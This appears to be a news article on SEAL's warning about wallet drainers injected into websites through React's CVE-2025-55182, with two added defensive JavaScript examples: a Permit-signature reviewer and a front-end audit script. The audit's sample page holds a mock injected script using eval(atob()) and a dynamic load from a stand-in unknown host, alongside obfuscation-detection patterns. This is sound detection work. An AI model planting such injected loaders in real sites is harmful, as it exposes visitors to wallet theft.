Cybersecurity nonprofit Security Alliance (SEAL) has reported a recent surge in crypto drainers being injected into websites via a vulnerability in the open-source JavaScript library React.
The React team, whose library is widely used for building web application user interfaces, disclosed on Dec. 3 that white-hat hacker Lachlan Davidson had identified a security flaw allowing unauthenticated remote code execution, potentially letting attackers insert and run their own code.
SEAL noted that malicious actors are exploiting this vulnerability, CVE-2025-55182, to secretly embed wallet-draining scripts on crypto websites.
“We are seeing a significant increase in drainers being uploaded to legitimate crypto websites through exploitation of the recent React CVE. All sites should immediately review their front-end code for suspicious assets,” SEAL said.
“The attack is targeting not only Web3 protocols! All websites are at risk. Users should exercise caution when signing ANY permit signature.”
Wallet drainers typically trick users into signing malicious transactions, often through fake pop-ups that promise rewards or use similar deceptive tactics.
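The following is an added example, not code from the article, from SEAL or from React. It shows the kind of pre-signing review a dApp front end or wallet extension can run on an EIP-2612 "Permit" request, the typed-data signature that drainers rely on and that SEAL's warning refers to: the spender is compared against the contracts the application actually uses, an unlimited allowance is flagged, and an implausibly distant deadline is flagged. It assumes the request arrives in the EIP-712 shape wallets receive via eth_signTypedData_v4; all addresses and the sample requests are constructed placeholders.

```javascript
// Added example (not from the article, SEAL or React): review an EIP-2612 Permit
// typed-data request before it reaches the wallet's signing prompt.
// Assumptions: EIP-712 payload as received via eth_signTypedData_v4; the caller knows
// which spender addresses it legitimately uses. Addresses below are constructed.

const UINT256_MAX = (1n << 256n) - 1n;
const ONE_YEAR_SECONDS = 365n * 24n * 3600n;

// Lower-case for comparison; payloads mix checksummed and lower-case address forms.
function normAddr(addr) {
  return String(addr).toLowerCase();
}

// Returns { verdict: 'allow' | 'block' | 'unreviewed', reasons, summary }.
// `summary` carries what the prompt should display: token, spender, amount, deadline.
function reviewPermitRequest(typedData, expectedSpenders, nowSeconds) {
  if (typedData.primaryType !== 'Permit') {
    return { verdict: 'unreviewed', reasons: ['not a Permit request'], summary: null };
  }
  const msg = typedData.message || {};
  const domain = typedData.domain || {};
  const reasons = [];

  // 1. The spender (recipient of the allowance) must be a contract the app uses.
  const allowed = new Set(expectedSpenders.map(normAddr));
  if (!allowed.has(normAddr(msg.spender))) {
    reasons.push(`spender ${msg.spender} is not an expected contract`);
  }

  // 2. An unlimited allowance is the drainer's default; a real flow knows its amount.
  const value = BigInt(msg.value);
  if (value === UINT256_MAX) {
    reasons.push('unlimited allowance (uint256 max) requested');
  }

  // 3. A far-future deadline lets a captured signature be used long after the visit.
  const deadline = BigInt(msg.deadline);
  if (deadline > BigInt(nowSeconds) + ONE_YEAR_SECONDS) {
    reasons.push('deadline is more than a year away');
  }

  return {
    verdict: reasons.length === 0 ? 'allow' : 'block',
    reasons,
    summary: {
      token: domain.verifyingContract,
      chainId: domain.chainId,
      spender: msg.spender,
      value: value.toString(),
      deadline: deadline.toString(),
    },
  };
}

// --- constructed sample data (placeholders, not real contracts) ---
const ROUTER = '0x' + '11'.repeat(20);          // the app's own router contract
const TOKEN = '0x' + '22'.repeat(20);           // the ERC-20 being permitted
const OWNER = '0x' + '33'.repeat(20);           // the user's wallet
const UNKNOWN_SPENDER = '0x' + 'ab'.repeat(20); // an address the app never uses
const NOW = 1700000000;                         // fixed "current time" for a reproducible run

function makePermit(spender, value, deadline) {
  return {
    types: {
      EIP712Domain: [
        { name: 'name', type: 'string' }, { name: 'version', type: 'string' },
        { name: 'chainId', type: 'uint256' }, { name: 'verifyingContract', type: 'address' },
      ],
      Permit: [
        { name: 'owner', type: 'address' }, { name: 'spender', type: 'address' },
        { name: 'value', type: 'uint256' }, { name: 'nonce', type: 'uint256' },
        { name: 'deadline', type: 'uint256' },
      ],
    },
    primaryType: 'Permit',
    domain: { name: 'Example Token', version: '1', chainId: 1, verifyingContract: TOKEN },
    message: { owner: OWNER, spender, value, nonce: '0', deadline },
  };
}

// A permit the app would legitimately request: known spender, bounded amount, 30-minute deadline.
const SAFE_REQUEST = makePermit(ROUTER, '1000000000000000000', String(NOW + 1800));
// The drainer pattern: unknown spender, unlimited amount, ten-year deadline.
const SUSPICIOUS_REQUEST = makePermit(UNKNOWN_SPENDER, '0x' + 'ff'.repeat(32), String(NOW + 315360000));

console.log(reviewPermitRequest(SAFE_REQUEST, [ROUTER], NOW).verdict);       // allow
console.log(reviewPermitRequest(SUSPICIOUS_REQUEST, [ROUTER], NOW).reasons); // three reasons
```

The checks are deliberately conservative: a legitimate flow that really needs an unlimited allowance would surface as a block and can be allowlisted explicitly, which is preferable to a silent approval. The `summary` object is what the signing prompt should render so the user sees the recipient, as SEAL advises.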

Websites flagged for phishing should check their code
According to SEAL, some websites may have been suddenly flagged as potential phishing risks without a clear explanation. The team advises website operators to check their own code so that no hidden wallet-draining scripts are putting users at risk.
“Scan your host for CVE-2025-55182. Check if your front-end code is unexpectedly loading assets from unknown hosts. Look for any obfuscated JavaScript in your scripts. Verify that wallet signature requests show the correct recipient,” SEAL said.
“If your project is being blocked, this could be the reason. Review your code carefully before requesting removal of the phishing warning,” the team added.
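As an added example, not code from the article, from SEAL or from React, the script below turns the front-end part of SEAL's checklist into a static audit: it lists `<script src>` hosts outside an allowlist, notes cross-origin scripts loaded without Subresource Integrity, and flags inline scripts that carry common obfuscation markers or unusually high character entropy, including URLs embedded in inline code that point at unknown hosts. It assumes the operator has the page's HTML as a string (fetched from the host or read from the build output) and knows which hosts the site legitimately loads from; the HTML, host names and payload strings are constructed for the example.

```javascript
// Added example (not from the article, SEAL or React): static audit of a page's
// front-end code for scripts from unknown hosts and obfuscated inline JavaScript.
// Assumptions: the page HTML is available as a string; the operator supplies its own
// host and an allowlist of legitimate asset hosts. Sample HTML below is constructed.

const OBFUSCATION_MARKERS = [
  { label: 'eval()', re: /\beval\s*\(/ },
  { label: 'atob()', re: /\batob\s*\(/ },
  { label: 'new Function()', re: /new\s+Function\s*\(/ },
  { label: 'hex-escaped string', re: /(?:\\x[0-9a-f]{2}){4,}/i },
  { label: 'unicode-escaped string', re: /(?:\\u[0-9a-f]{4}){4,}/i },
  { label: '_0x-style identifiers', re: /\b_0x[0-9a-f]{4,}\b/ },
];
const ENTROPY_THRESHOLD = 5.0; // bits per character; packed or encoded payloads sit above this

// Shannon entropy of a string in bits per character.
function shannonEntropy(text) {
  if (!text.length) return 0;
  const counts = new Map();
  for (const ch of text) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / text.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Resolve relative, protocol-relative and absolute URLs against the site's own host.
function hostOf(url, ownHost) {
  try {
    return new URL(url, `https://${ownHost}/`).host.toLowerCase();
  } catch {
    return null; // unparsable src: treat as unknown
  }
}

// Returns a list of { script, kind, detail } findings, in document order.
function auditFrontEnd(html, ownHost, allowedHosts) {
  const own = ownHost.toLowerCase();
  const allowed = new Set([own, ...allowedHosts.map((h) => h.toLowerCase())]);
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  let index = 0;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (srcMatch) {
      const src = srcMatch[1];
      const host = hostOf(src, own);
      if (host === null || !allowed.has(host)) {
        findings.push({ script: index, kind: 'external-src-unknown-host', detail: src });
      } else if (host !== own && !/\bintegrity\s*=/i.test(attrs)) {
        findings.push({ script: index, kind: 'cross-origin-without-sri', detail: src });
      }
    } else {
      const markers = OBFUSCATION_MARKERS.filter((k) => k.re.test(body)).map((k) => k.label);
      const entropy = shannonEntropy(body);
      if (entropy > ENTROPY_THRESHOLD) markers.push(`entropy ${entropy.toFixed(2)} bits/char`);
      if (markers.length) {
        findings.push({ script: index, kind: 'inline-obfuscation', detail: markers.join(', ') });
      }
      // Dynamic loaders often name the unknown host inside inline code rather than in a src.
      for (const u of body.match(/https?:\/\/[^\s"'`)]+/g) || []) {
        const host = hostOf(u, own);
        if (host === null || !allowed.has(host)) {
          findings.push({ script: index, kind: 'inline-url-unknown-host', detail: u });
        }
      }
    }
    index += 1;
  }
  return findings;
}

// Constructed sample page: own-host script, CDN script with and without SRI, a plain
// config snippet, and an injected inline script in the drainer style (payload is a placeholder).
const SAMPLE_HTML = `
<!doctype html><html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example-dapp.test/vendor.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://cdn.example-dapp.test/analytics.js"></script>
<script>window.__APP_CONFIG__={api:"/api"};</script>
<script>var _0x4f2a=["c3Ry"];eval(atob("Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXI="));var s=document.createElement("script");s.src="https://assets.unknown-host.test/w.js";document.head.appendChild(s);</script>
</head><body></body></html>`;

console.log(auditFrontEnd(SAMPLE_HTML, 'app.example-dapp.test', ['cdn.example-dapp.test']));
```

Run it against the served HTML rather than the source tree: the injected script in this incident class appears in what the host actually delivers. A clean result from this audit does not clear the host itself, so it complements, and does not replace, scanning for CVE-2025-55182 as SEAL's first item asks.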

React releases fix for the vulnerability
The React team released a patch for CVE-2025-55182 on Dec. 3, urging anyone using react-server-dom-webpack, react-server-dom-parcel, or react-server-dom-turbopack to upgrade immediately.
“If your app’s React code does not use a server, it is not affected. Similarly, apps that don’t use a framework, bundler, or bundler plugin supporting React Server Components are also unaffected,” the React team clarified.